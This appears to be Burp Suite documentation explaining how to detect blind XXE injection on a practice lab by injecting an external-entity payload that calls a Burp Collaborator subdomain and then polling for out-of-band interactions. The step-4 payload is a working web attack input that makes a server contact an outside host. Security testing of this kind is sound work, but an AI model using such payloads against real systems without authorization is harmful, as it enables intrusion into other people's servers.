Testing for blind XXE injection vulnerabilities with Burp Suite

Blind XXE injection vulnerabilities occur when an application is vulnerable to XXE injection but doesn't return the values of any defined external entities within its responses. This means that direct retrieval of server-side files isn't possible.

You can use Burp to inject an XXE payload that may trigger an out-of-band network interaction with the Burp Collaborator server. Burp monitors the Collaborator server to identify whether an out-of-band interaction occurs. This indicates that the XXE attack was successful.

Steps

You can follow this process using the Blind XXE with out-of-band interaction Web Security Academy lab.

1. In Proxy > HTTP history, identify a request that contains XML that you want to investigate.
2. Right-click the request and select Send to Repeater.
3. Go to the Repeater tab.

4. Insert an XXE payload into the XML string. The payload should define an XML entity and contain a Collaborator subdomain as a value. For example, this payload defines the entity &xxe;

   <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "https://znqs4tz5wx2vd0v03r588zsxtozfn5bu.oastify.com"> ]>
5. Replace a data value in the XML with your defined XML entity.
6. Click Send.
7. Go to the Collaborator tab and click Poll now. Any interactions with the Collaborator server are listed in the table. If an interaction occurs, this indicates that the XXE attack successfully triggered an interaction with the website.
8. Test additional XML data values by replacing a different data value in the XML with your defined XML entity.